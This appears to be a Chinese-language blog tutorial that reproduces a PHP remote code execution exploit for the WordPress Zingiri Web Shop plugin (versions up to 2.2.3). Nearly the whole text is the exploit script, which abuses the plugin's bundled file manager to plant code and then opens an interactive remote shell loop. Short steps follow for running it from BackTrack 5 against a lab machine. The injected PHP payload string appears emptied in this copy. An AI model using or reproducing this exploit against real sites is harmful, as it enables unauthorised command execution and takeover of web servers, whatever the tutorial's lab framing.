Wordpress Zingiri Plugin的***代码如下:


error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

$fileman = "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager";

function http_send($host, $packet)

{

   if (!($sock = fsockopen($host, 80)))

       die( "\n[-] No response from {$host}:80\n");

   fwrite($sock, $packet);

   return stream_get_contents($sock);

}

function get_root_dir()

{

   global $host, $path, $fileman;

   $packet  = "GET {$path}{$fileman}/ajaxfilemanager.php HTTP/1.0\r\n";

   $packet .= "Host: {$host}\r\n";

   $packet .= "Connection: close\r\n\r\n";

   if (!preg_match('/currentFolderPath" value="([^"]*)"/', http_send($host, $packet), $m)) die("\n[-] Root folder path not found!\n");

   return $m[1];

}


function random_mkdir()

{

   global $host, $path, $fileman, $rootdir;

   $dirname = uniqid();

   $payload = "new_folder={$dirname}¤tFolderPath={$rootdir}";

   $packet  = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";

   $packet .= "Host: {$host}\r\n";

   $packet .= "Content-Length: ".strlen($payload)."\r\n";

   $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

   $packet .= "Connection: close\r\n\r\n{$payload}";

       http_send($host, $packet);  

   return $dirname;

}

print "\n+----------------------------------------------------------------------------------+";

print "\n| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |";

print "\n+----------------------------------------------------------------------------------+\n";

if ($argc < 3)

{

   print "\nUsage......: php $argv[0] \n";

   print "\nExample....: php $argv[0] localhost /";

   print "\nExample....: php $argv[0] localhost /wordpress/\n";

   die();

}

$host = $argv[1];

$path = $argv[2];

$rootdir = get_root_dir();

$phpcode = "";

$payload = "selectedDoc[]={$phpcode}¤tFolderPath={$rootdir}";

$packet  = "POST {$path}{$fileman}/ajax_file_cut.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";

if (!preg_match("/Set-Cookie: ([^;]*);/", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");

$dirname = random_mkdir();

$newname = uniqid();


$payload = "value={$newname}&id={$rootdir}{$dirname}";

$packet  = "POST {$path}{$fileman}/ajax_save_name.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cookie: {$sid[1]}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";

http_send($host, $packet);

$packet  = "GET {$path}{$fileman}/inc/data.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";

while(1)

{

   print "\nzingiri-shell# ";

   if (($cmd = trim(fgets(STDIN))) == "exit") break;

   preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?

   print $m[1] : die("\n[-] Exploit failed!\n");

}

?>


1、将代码保存为exp.php,存放在BT5中/etc下;

2、在BT5中输入:root@bt:/etc# php exp.php 192.168.0.133 /wordpress/   如图:

BT5下利用WordpressZingiri Plugin***靶机镜像wordpress_第1张图片

3、通过PHP***代码得到目标主机的Shell   如图:BT5下利用WordpressZingiri Plugin***靶机镜像wordpress_第2张图片

注:本文依据教程演示,进行试验,如有不对的地方,请指正